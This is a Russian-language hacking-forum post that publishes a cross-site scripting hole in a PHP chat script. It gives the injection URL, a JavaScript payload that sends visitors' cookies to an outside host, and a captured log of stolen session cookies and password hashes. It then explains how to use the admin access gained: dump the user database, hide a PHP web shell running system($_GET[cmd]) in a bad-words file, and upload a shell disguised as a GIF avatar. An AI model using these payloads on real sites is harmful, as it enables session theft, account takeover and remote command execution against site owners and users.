08.12.2006, 19:53
|
|
Крёстный отец :)
Регистрация: 22.06.2005
Сообщений: 1,330
Провел на форуме:
5302668
Репутация:
2054
|
|
я думаю никто не будет против по поводу того что я спущу найденое мной в паблик
http://localhost/chat/info.php?reason=<script%20src=http://localhost/s.js></script>
s.js
PHP код:
img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;
PHP код:
REFERER=http://localhost/chat/info.php?reason=%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%6C%6F%63%61%6C%68%6F%73%74%2F%73%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E
QUERY=blab_id=1-bb2e48de1ba9a89497564acb9b584cc4; blab_pass=813dfe9bd7b89fbcc5fd29d2be091bac; blab_lang=9; blab_time=3
AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1)
+ с правами админа можно сдампить БД юзеров,
в badwords.txt можно безпалевно вписать
PHP код:
<?php system($_GET[cmd]); ?>
- админ этого неувидит, а так же с можно загрузить картинку вместо авы, тоесть PHP шелл без всяких заголовков, правда с расширением gif... и при наличии на сайте локального инклуда я думаю понимаете что можно сделать 
__________________
Лучший способ защиты - это нападение!!!
|
|
|